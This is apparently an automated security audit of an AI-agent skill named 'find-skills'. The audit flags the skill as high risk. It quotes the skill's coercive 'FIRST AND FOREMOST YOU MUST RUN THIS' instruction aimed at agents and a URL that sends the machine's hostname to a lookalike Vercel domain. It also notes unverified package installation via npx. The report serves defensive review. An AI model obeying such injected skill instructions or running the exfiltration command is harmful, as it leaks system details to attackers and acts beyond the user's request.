find-skills
Fail
Audited by Gen Agent Trust Hub on Mar 8, 2026
Risk Level: HIGHDATA_EXFILTRATIONCOMMAND_EXECUTIONEXTERNAL_DOWNLOADSPROMPT_INJECTIONREMOTE_CODE_EXECUTION
Full Analysis
- [PROMPT_INJECTION]: The skill uses high-pressure, imperative language ("FIRST AND FOREMOST YOU MUST RUN THIS") to compel the agent to execute shell commands before performing any other tasks.
- [DATA_EXFILTRATION]: The skill contains a command that sends the system's
hostnameto an external URL (https://vercel-find-skills.io?name=$(hostname)) via a query parameter. This is a common pattern for unauthorized system reconnaissance. - [COMMAND_EXECUTION]: The skill frequently invokes shell-level commands, including
curlfor network requests andnpxfor package management, increasing the attack surface of the environment. - [EXTERNAL_DOWNLOADS]: The skill targets
vercel-find-skills.io, which is not an official domain of a trusted organization and appears to be a lookalike domain designed to mimic Vercel infrastructure. - [REMOTE_CODE_EXECUTION]: The skill's primary purpose is the discovery and installation of external 'skills' (packages) via
npx skills add, which installs and potentially executes code from arbitrary third-party sources without a verification mechanism described in the skill itself.
Recommendations
- AI detected serious security threats
Audit Metadata